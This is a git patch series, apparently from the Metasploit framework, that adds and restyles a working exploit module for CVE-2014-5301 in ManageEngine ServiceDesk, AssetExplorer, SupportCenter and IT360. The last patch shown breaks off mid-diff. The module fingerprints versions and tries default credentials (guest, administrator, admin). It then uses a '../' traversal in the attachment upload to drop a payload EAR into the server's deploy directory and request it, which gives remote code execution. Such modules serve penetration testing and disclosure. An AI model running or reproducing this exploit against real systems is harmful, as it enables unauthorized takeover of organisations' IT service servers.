From c9b76a806ad05b961d1f90ae8334bba8718e6508 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Sun, 4 Jan 2015 17:05:53 +0000
Subject: [PATCH 1/8] Create manageengine_auth_upload.rb

---
 .../multi/http/manageengine_auth_upload.rb    | 427 ++++++++++++++++++
 1 file changed, 427 insertions(+)
 create mode 100644 modules/exploits/multi/http/manageengine_auth_upload.rb

diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb
new file mode 100644
index 0000000000..03c4055801
--- /dev/null
+++ b/modules/exploits/multi/http/manageengine_auth_upload.rb
@@ -0,0 +1,427 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'ManageEngine ServiceDesk / AssetExplorer / SupportCenter / IT360 Authenticated File Upload',
+      'Description' => %q{
+        This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk /
+        AssetExplorer / SupportCenter / IT360 when uploading attachment files. The JSP that accepts
+        the upload does not handle correctly '../' sequences, which can be abused to write
+        anywhere in the file system.
+        Authentication is needed to exploit this vulnerability, but this module will attempt
+        to login using the default credentials for the administrator and guest accounts;
+        alternatively you can provide a pre-authenticated cookie or a username / password combo.
+        For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400).
+        All versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,
+        SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this
+        module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been
+        been tested successfully in Windows and Linux on several versions.
+      },
+      'Author'       =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2014-5301' ],
+          [ 'OSVDB', 'TODO' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt' ],
+          [ 'URL', 'FULLDISC_URL' ]
+        ],
+      'DefaultOptions' => { 'WfsDelay' => 30 },
+      'Privileged'  => false,            # Privileged on Windows but not on Linux targets
+      'Platform'    => 'java',
+      'Arch'        => ARCH_JAVA,
+      'Targets'     =>
+        [
+          [ 'Automatic', { } ],
+          [ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9 - Java Universal',
+            {
+              'attachment_path' => '/workorder/Attachment.jsp'
+            }
+          ],
+          [ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1 - Java Universal',
+            {
+              'attachment_path' => '/common/FileAttachment.jsp'
+            }
+          ],
+          [ 'IT360 v8-v10.4 - Java Universal',
+            {
+              'attachment_path' => '/common/FileAttachment.jsp'
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Dec 15 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptInt.new('SLEEP',
+          [true, 'Seconds to sleep while we wait for EAR deployment', 15]),
+        OptString.new('JSESSIONID',
+          [false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']),
+        OptString.new('IAMAGENTTICKET',
+          [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
+        OptString.new('USERNAME',
+          [true, 'The username to login as', 'guest']),
+        OptString.new('PASSWORD',
+          [true, 'Password for the specified username', 'guest']),
+        OptString.new('DOMAIN_NAME',
+          [false, 'Name of the domain to logon to'])
+      ], self.class)
+  end
+
+
+  def get_version
+    res = send_request_cgi({
+      'uri'    => "/",
+      'method' => 'GET'
+    })
+
+    # Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenterl; it = it360)
+    version = [ "9999", "9999", "0", "sd" ]
+
+    if res && res.code == 200
+      if res.body.to_s =~ /ManageEngine ServiceDesk/
+        if res.body.to_s =~ /&nbsp;&nbsp;\|&nbsp;&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/
+          output = $1
+          version = [ output[0], output[2], "0", "sd" ]
+        end
+        if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/     # newer builds
+          version[2] = $1
+        elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/   # older builds
+          version[2] = $1
+        end
+      elsif res.body.to_s =~ /ManageEngine AssetExplorer/
+        if res.body.to_s =~ /ManageEngine AssetExplorer &nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/   or
+        res.body.to_s =~ /<div class="login-versioninfo">version&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
+          output = $1
+          version = [ output[0], output[2], "0", "ae" ]
+        end
+        if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/
+          version[2] = $1
+        end
+      elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/
+        # All of the vulnerable sc installations are "old style", so we don't care about the major / minor version
+        version[3] = "sc"
+        if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
+          # ... but get the build number if we can find it
+          version[2] = $1
+        end
+      elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/
+        # IT360 newer versions
+        version[3] = "it"
+      end
+    elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
+      # IT360 older versions, not a very good detection string but there is no alternative?
+      version[3] = "it"
+    end
+    return version
+  end
+
+
+  def check
+    version = get_version
+    # TODO: put fixed version on the two ifs below once (if...) products are fixed (sd is done)
+    if (version[0] <= "9" && version[0] > "4" && version[2] < "9031" && version[3] == "sd") ||    #sd was fixed on build 9031
+    (version[0] <= "6" && version[2] < "99999" && version[3] == "ae") ||
+    (version[3] == "sc" && version[2] < "99999")
+      return Exploit::CheckCode::Appears
+    end
+
+    if (version[2] > "9030" && version[3] == "sd") ||
+    (version[2] > "99999" && version[3] == "ae") ||
+    (version[2] > "99999" && version[3] == "sc")
+      return Exploit::CheckCode::Safe
+    else
+      # An IT360 check always lands here, there is no way to get the version easily
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+
+  def authenticate_it360(port, path, username, password)
+    if datastore['DOMAIN_NAME'] == nil
+      vars_post = {
+          'LOGIN_ID' => username,
+          'PASSWORD' => password,
+          'isADEnabled' => "false"
+      }
+    else
+      vars_post = {
+          'LOGIN_ID' => username,
+          'PASSWORD' => password,
+          'isADEnabled' => "true",
+          'domainName' => datastore['DOMAIN_NAME']
+      }
+    end
+
+    sd_port = datastore['RPORT']
+    datastore['RPORT'] = port
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(path),
+      'vars_get' => {
+        'service' => "ServiceDesk",
+        'furl' => "/",
+        'timestamp' => "14" + rand_text_numeric(11)
+      },
+      'vars_post' => vars_post
+    })
+
+    datastore['RPORT'] = sd_port
+
+    if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
+      # /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
+      return res.get_cookies
+    else
+      return nil
+    end
+  end
+
+
+  def get_it360_cookie_name
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri("/"),
+    })
+    cookie = res.get_cookies
+    if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
+      return $1
+    else
+      return nil
+    end
+  end
+
+
+  def login_it360
+    # Do we already have a valid cookie? If yes, just return that.
+    if datastore['IAMAGENTTICKET'] != nil
+      cookie_name = get_it360_cookie_name
+      cookie = "IAMAGENTTICKET" + cookie_name + "=" + datastore['IAMAGENTTICKET'] + ";"
+      return cookie
+    end
+
+    # get the correct path, host and port
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri("/"),
+    })
+
+    if res && res.redirect?
+      uri = [ res.redirection.port, res.redirection.path ]
+    else
+      return nil
+    end
+
+    cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
+    if cookie != nil
+      return cookie
+    elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
+      # we've tried with the default guest password, now let's try with the default admin password
+      cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator')
+      if cookie != nil
+        return cookie
+      else
+        # Try one more time with the default admin login for some versions
+        cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin')
+        if cookie != nil
+          return cookie
+        end
+      end
+    end
+    return nil
+  end
+
+
+  #
+  # Authenticate and validate our session cookie. We need to submit credentials to
+  # j_security_check and then follow the redirect to HomePage.do to create a valid
+  # authenticated session.
+  #
+  def authenticate(cookie, username, password)
+    res = send_request_cgi!({
+      'method' => 'POST',
+      'uri' => normalize_uri("/j_security_check;" + cookie.to_s.gsub(";","")),
+      'ctype' => "application/x-www-form-urlencoded",
+      'cookie' => cookie,
+      'vars_post' => {
+        'j_username' => username,
+        'j_password' => password,
+        'logonDomainName' => datastore['DOMAIN_NAME']
+      }
+    })
+    if res && (res.code == 302 || (res.code == 200 && res.body.to_s =~ /redirectTo="\+'HomePage\.do';/))
+    # sd and ae respond with 302 while sc responds with a 200
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri("/HomePage.do")
+      })
+      return true
+    else
+      return false
+    end
+  end
+
+
+  def login
+    # Do we already have a valid cookie? If yes, just return that.
+    if datastore['JSESSIONID'] != nil
+      cookie = "JSESSIONID=" + datastore['JSESSIONID'].to_s + ";"
+      return cookie
+    end
+
+    # First we get a valid JSESSIONID to pass to authenticate()
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri("/")
+    })
+    if res && res.code == 200
+      cookie = res.get_cookies
+      authenticated = authenticate(cookie, datastore['USERNAME'], datastore['PASSWORD'])
+      if authenticated
+        return cookie
+      elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
+        # we've tried with the default guest password, now let's try with the default admin password
+        authenticated = authenticate(cookie, 'administrator', 'administrator')
+        if authenticated
+          return cookie
+        else
+          # Try one more time with the default admin login for some versions
+          authenticated = authenticate(cookie, 'admin', 'admin')
+          if authenticated
+            return cookie
+          end
+        end
+      end
+    end
+    return nil
+  end
+
+
+  def send_multipart_request(cookie, payload_name, payload_str)
+    if payload_name =~ /\.ear/
+      upload_path = '../../server/default/deploy'
+    else
+      upload_path = rand_text_alpha(4+rand(4))
+    end
+
+    post_data = Rex::MIME::Message.new
+
+    if @my_target == targets[1]
+      # old style
+      post_data.add_part(payload_str, "application/octet-stream", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
+      post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"")
+      post_data.add_part("", nil, nil, "form-data; name=\"vecPath\"")
+      post_data.add_part("", nil, nil, "form-data; name=\"vec\"")
+      post_data.add_part("AttachFile", nil, nil, "form-data; name=\"theSubmit\"")
+      post_data.add_part("WorkOrderForm", nil, nil, "form-data; name=\"formName\"")
+      post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"")
+      post_data.add_part("Attach", nil, nil, "form-data; name=\"ATTACH\"")
+    else
+      post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"")
+      post_data.add_part(payload_str, "application/octet-stream", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
+      post_data.add_part("", nil, nil, "form-data; name=\"att_desc\"")
+    end
+
+    data = post_data.to_s
+    res = send_request_cgi({
+      'uri' => normalize_uri(@my_target['attachment_path']),
+      'method' => 'POST',
+      'data' => data,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'cookie' => cookie
+    })
+    return res
+  end
+
+
+  def pick_target
+    return target if target.name != 'Automatic'
+
+    version = get_version
+    if (version[0] <= "7" && version[2] < "7016" && version[3] == "sd") ||
+    (version[0] == "4" && version[3] == "ae") ||
+    (version[3] == "sc")
+      # These are all "old style" versions (sc is always old style)
+      return targets[1]
+    elsif version[3] == "it"
+      return targets[3]
+    else
+      return targets[2]
+    end
+  end
+
+
+  def exploit
+    @my_target = pick_target
+    print_status("#{peer} - Selected target #{@my_target.name}")
+
+    if @my_target == targets[3]
+      cookie = login_it360
+    else
+      cookie = login
+    end
+    if cookie == nil
+      fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
+    end
+
+    # First we generate the WAR with the payload...
+    war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+    war_payload = payload.encoded_war({ :app_name => war_app_base })
+
+    # ... and then we create an EAR file that will contain it.
+    ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+    app_xml = %Q{<?xml version="1.0" encoding="UTF-8"?><application><display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name><module><web><web-uri>#{war_app_base + ".war"}</web-uri><context-root>/#{ear_app_base}</context-root></web></module></application>}
+
+    # Zipping with CM_STORE to avoid errors while decompressing the zip
+    # in the Java vulnerable application
+    ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+    ear_file.add_file(war_app_base + ".war", war_payload.to_s)
+    ear_file.add_file("META-INF/application.xml", app_xml)
+    ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + ".ear"
+
+    if @my_target != targets[3]
+      # Linux doesn't like it when we traverse non existing directories,
+      # so let's create them by sending some random data before the EAR.
+      # (IT360 does not have a Linux version so we skip the bogus file for it)
+      print_status("#{peer} - Uploading bogus file...")
+      res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4)))
+      if res && res.code != 200
+        fail_with(Exploit::Failure::Unknown, "#{peer} - Bogus file upload failed")
+      end
+    end
+
+    # Now send the actual payload
+    print_status("#{peer} - Uploading EAR file...")
+    res = send_multipart_request(cookie, ear_file_name, ear_file.pack)
+    if res && res.code == 200
+      print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
+      " seconds for deployment")
+      sleep(datastore['SLEEP'])
+    else
+      fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed")
+    end
+
+    res = send_request_cgi({
+      'uri'    => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+      'method' => 'GET'
+    })
+    if res && res.code != 200
+      fail_with(Exploit::Failure::Unknown, "#{peer} - Exploit failed, received HTTP " + res.code.to_s)
+    end
+  end
+end

From c76aec60b02e3510d987d8bb277724b78a27f8c2 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Thu, 8 Jan 2015 23:29:38 +0000
Subject: [PATCH 2/8] Add OSVDB id and full disclosure URL

---
 modules/exploits/multi/http/manageengine_auth_upload.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb
index 03c4055801..9e1ab93c1e 100644
--- a/modules/exploits/multi/http/manageengine_auth_upload.rb
+++ b/modules/exploits/multi/http/manageengine_auth_upload.rb
@@ -35,9 +35,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'  =>
         [
           [ 'CVE', '2014-5301' ],
-          [ 'OSVDB', 'TODO' ],
+          [ 'OSVDB', '116733' ],
           [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt' ],
-          [ 'URL', 'FULLDISC_URL' ]
+          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jan/5' ]
         ],
       'DefaultOptions' => { 'WfsDelay' => 30 },
       'Privileged'  => false,            # Privileged on Windows but not on Linux targets

From 3768cf0a69b67c2ea001ccb2dc75989ee498b421 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Wed, 14 Jan 2015 22:59:11 +0000
Subject: [PATCH 3/8] Change version to int and add proper timestamp

---
 .../multi/http/manageengine_auth_upload.rb    | 34 +++++++++----------
 1 file changed, 17 insertions(+), 17 deletions(-)

diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb
index 9e1ab93c1e..782f25b20c 100644
--- a/modules/exploits/multi/http/manageengine_auth_upload.rb
+++ b/modules/exploits/multi/http/manageengine_auth_upload.rb
@@ -91,34 +91,34 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     # Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenterl; it = it360)
-    version = [ "9999", "9999", "0", "sd" ]
+    version = [ 9999, 9999, 0, "sd" ]
 
     if res && res.code == 200
       if res.body.to_s =~ /ManageEngine ServiceDesk/
         if res.body.to_s =~ /&nbsp;&nbsp;\|&nbsp;&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/
           output = $1
-          version = [ output[0], output[2], "0", "sd" ]
+          version = [ output[0].to_i, output[2].to_i, "0", "sd" ]
         end
         if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/     # newer builds
-          version[2] = $1
+          version[2] = $1.to_i
         elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/   # older builds
-          version[2] = $1
+          version[2] = $1.to_i
         end
       elsif res.body.to_s =~ /ManageEngine AssetExplorer/
         if res.body.to_s =~ /ManageEngine AssetExplorer &nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/   or
         res.body.to_s =~ /<div class="login-versioninfo">version&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
           output = $1
-          version = [ output[0], output[2], "0", "ae" ]
+          version = [ output[0].to_i, output[2].to_i, 0, "ae" ]
         end
         if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/
-          version[2] = $1
+          version[2] = $1.to_i
         end
       elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/
         # All of the vulnerable sc installations are "old style", so we don't care about the major / minor version
         version[3] = "sc"
         if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
           # ... but get the build number if we can find it
-          version[2] = $1
+          version[2] = $1.to_i
         end
       elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/
         # IT360 newer versions
@@ -134,16 +134,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def check
     version = get_version
-    # TODO: put fixed version on the two ifs below once (if...) products are fixed (sd is done)
-    if (version[0] <= "9" && version[0] > "4" && version[2] < "9031" && version[3] == "sd") ||    #sd was fixed on build 9031
-    (version[0] <= "6" && version[2] < "99999" && version[3] == "ae") ||
-    (version[3] == "sc" && version[2] < "99999")
+    # TODO: put fixed version on the two ifs below once (if...) products are fixed (sd was fixed on build 9031; ae and sc still not fixed)
+    if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == "sd") ||
+    (version[0] <= 6 && version[2] < 99999 && version[3] == "ae") ||
+    (version[3] == "sc" && version[2] < 99999)
       return Exploit::CheckCode::Appears
     end
 
-    if (version[2] > "9030" && version[3] == "sd") ||
-    (version[2] > "99999" && version[3] == "ae") ||
-    (version[2] > "99999" && version[3] == "sc")
+    if (version[2] > 9030 && version[3] == "sd") ||
+    (version[2] > 99999 && version[3] == "ae") ||
+    (version[2] > 99999 && version[3] == "sc")
       return Exploit::CheckCode::Safe
     else
       # An IT360 check always lands here, there is no way to get the version easily
@@ -177,7 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'vars_get' => {
         'service' => "ServiceDesk",
         'furl' => "/",
-        'timestamp' => "14" + rand_text_numeric(11)
+        'timestamp' => Time.now.to_i
       },
       'vars_post' => vars_post
     })
@@ -353,8 +353,8 @@ class Metasploit3 < Msf::Exploit::Remote
     return target if target.name != 'Automatic'
 
     version = get_version
-    if (version[0] <= "7" && version[2] < "7016" && version[3] == "sd") ||
-    (version[0] == "4" && version[3] == "ae") ||
+    if (version[0] <= 7 && version[2] < 7016 && version[3] == "sd") ||
+    (version[0] == 4 && version[3] == "ae") ||
     (version[3] == "sc")
       # These are all "old style" versions (sc is always old style)
       return targets[1]

From ddda0b2f4b1b2bd532a1aee88fb3ab2b0fb08fb8 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 19 Jan 2015 14:59:31 -0600
Subject: [PATCH 4/8] Beautify metadata

---
 .../multi/http/manageengine_auth_upload.rb    | 47 +++++++++----------
 1 file changed, 23 insertions(+), 24 deletions(-)

diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb
index 782f25b20c..d2b58a8414 100644
--- a/modules/exploits/multi/http/manageengine_auth_upload.rb
+++ b/modules/exploits/multi/http/manageengine_auth_upload.rb
@@ -12,51 +12,50 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'ManageEngine ServiceDesk / AssetExplorer / SupportCenter / IT360 Authenticated File Upload',
-      'Description' => %q{
-        This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk /
-        AssetExplorer / SupportCenter / IT360 when uploading attachment files. The JSP that accepts
+      'Name'          => 'ManageEngine Multiple Products Authenticated File Upload',
+      'Description'   => %q{
+        This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,
+        AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts
         the upload does not handle correctly '../' sequences, which can be abused to write
-        anywhere in the file system.
-        Authentication is needed to exploit this vulnerability, but this module will attempt
-        to login using the default credentials for the administrator and guest accounts;
-        alternatively you can provide a pre-authenticated cookie or a username / password combo.
-        For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400).
-        All versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,
+        in the file system. Authentication is needed to exploit this vulnerability, but this module
+        will attempt to login using the default credentials for the administrator and guest
+        accounts. Alternatively you can provide a pre-authenticated cookie or a username / password
+        combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All
+        versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,
         SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this
         module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been
         been tested successfully in Windows and Linux on several versions.
       },
-      'Author'       =>
+      'Author'        =>
         [
           'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
         ],
-      'License'     => MSF_LICENSE,
-      'References'  =>
+      'License'       => MSF_LICENSE,
+      'References'    =>
         [
-          [ 'CVE', '2014-5301' ],
-          [ 'OSVDB', '116733' ],
-          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt' ],
-          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jan/5' ]
+          ['CVE', '2014-5301'],
+          ['OSVDB', '116733'],
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'],
+          ['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5']
         ],
       'DefaultOptions' => { 'WfsDelay' => 30 },
-      'Privileged'  => false,            # Privileged on Windows but not on Linux targets
-      'Platform'    => 'java',
-      'Arch'        => ARCH_JAVA,
-      'Targets'     =>
+      'Privileged'     => false, # Privileged on Windows but not on Linux targets
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Targets'        =>
         [
           [ 'Automatic', { } ],
-          [ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9 - Java Universal',
+          [ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9',
             {
               'attachment_path' => '/workorder/Attachment.jsp'
             }
           ],
-          [ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1 - Java Universal',
+          [ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1',
             {
               'attachment_path' => '/common/FileAttachment.jsp'
             }
           ],
-          [ 'IT360 v8-v10.4 - Java Universal',
+          [ 'IT360 v8-v10.4',
             {
               'attachment_path' => '/common/FileAttachment.jsp'
             }

From 3c0efe4a7e838584954cebeee6c97c59e8a605cb Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 19 Jan 2015 15:36:05 -0600
Subject: [PATCH 5/8] Do minor style changes

---
 .../multi/http/manageengine_auth_upload.rb    | 101 +++++++++---------
 1 file changed, 53 insertions(+), 48 deletions(-)

diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb
index d2b58a8414..f1758dfa69 100644
--- a/modules/exploits/multi/http/manageengine_auth_upload.rb
+++ b/modules/exploits/multi/http/manageengine_auth_upload.rb
@@ -85,18 +85,18 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def get_version
     res = send_request_cgi({
-      'uri'    => "/",
+      'uri'    => '/',
       'method' => 'GET'
     })
 
     # Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenterl; it = it360)
-    version = [ 9999, 9999, 0, "sd" ]
+    version = [ 9999, 9999, 0, 'sd' ]
 
     if res && res.code == 200
       if res.body.to_s =~ /ManageEngine ServiceDesk/
         if res.body.to_s =~ /&nbsp;&nbsp;\|&nbsp;&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/
           output = $1
-          version = [ output[0].to_i, output[2].to_i, "0", "sd" ]
+          version = [output[0].to_i, output[2].to_i, '0', 'sd']
         end
         if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/     # newer builds
           version[2] = $1.to_i
@@ -104,45 +104,48 @@ class Metasploit3 < Msf::Exploit::Remote
           version[2] = $1.to_i
         end
       elsif res.body.to_s =~ /ManageEngine AssetExplorer/
-        if res.body.to_s =~ /ManageEngine AssetExplorer &nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/   or
-        res.body.to_s =~ /<div class="login-versioninfo">version&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
+        if res.body.to_s =~ /ManageEngine AssetExplorer &nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ ||
+            res.body.to_s =~ /<div class="login-versioninfo">version&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
           output = $1
-          version = [ output[0].to_i, output[2].to_i, 0, "ae" ]
+          version = [output[0].to_i, output[2].to_i, 0, 'ae']
         end
         if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/
           version[2] = $1.to_i
         end
       elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/
         # All of the vulnerable sc installations are "old style", so we don't care about the major / minor version
-        version[3] = "sc"
+        version[3] = 'sc'
         if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
           # ... but get the build number if we can find it
           version[2] = $1.to_i
         end
       elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/
         # IT360 newer versions
-        version[3] = "it"
+        version[3] = 'it'
       end
     elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
       # IT360 older versions, not a very good detection string but there is no alternative?
-      version[3] = "it"
+      version[3] = 'it'
     end
-    return version
+
+    version
   end
 
 
   def check
     version = get_version
-    # TODO: put fixed version on the two ifs below once (if...) products are fixed (sd was fixed on build 9031; ae and sc still not fixed)
-    if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == "sd") ||
-    (version[0] <= 6 && version[2] < 99999 && version[3] == "ae") ||
-    (version[3] == "sc" && version[2] < 99999)
+    # TODO: put fixed version on the two ifs below once (if...) products are fixed
+    # sd was fixed on build 9031
+    # ae and sc still not fixed
+    if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') ||
+    (version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') ||
+    (version[3] == 'sc' && version[2] < 99999)
       return Exploit::CheckCode::Appears
     end
 
-    if (version[2] > 9030 && version[3] == "sd") ||
-    (version[2] > 99999 && version[3] == "ae") ||
-    (version[2] > 99999 && version[3] == "sc")
+    if (version[2] > 9030 && version[3] == 'sd') ||
+        (version[2] > 99999 && version[3] == 'ae') ||
+        (version[2] > 99999 && version[3] == 'sc')
       return Exploit::CheckCode::Safe
     else
       # An IT360 check always lands here, there is no way to get the version easily
@@ -154,15 +157,15 @@ class Metasploit3 < Msf::Exploit::Remote
   def authenticate_it360(port, path, username, password)
     if datastore['DOMAIN_NAME'] == nil
       vars_post = {
-          'LOGIN_ID' => username,
-          'PASSWORD' => password,
-          'isADEnabled' => "false"
+        'LOGIN_ID' => username,
+        'PASSWORD' => password,
+        'isADEnabled' => 'false'
       }
     else
       vars_post = {
           'LOGIN_ID' => username,
           'PASSWORD' => password,
-          'isADEnabled' => "true",
+          'isADEnabled' => 'true',
           'domainName' => datastore['DOMAIN_NAME']
       }
     end
@@ -174,8 +177,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(path),
       'vars_get' => {
-        'service' => "ServiceDesk",
-        'furl' => "/",
+        'service' => 'ServiceDesk',
+        'furl' => '/',
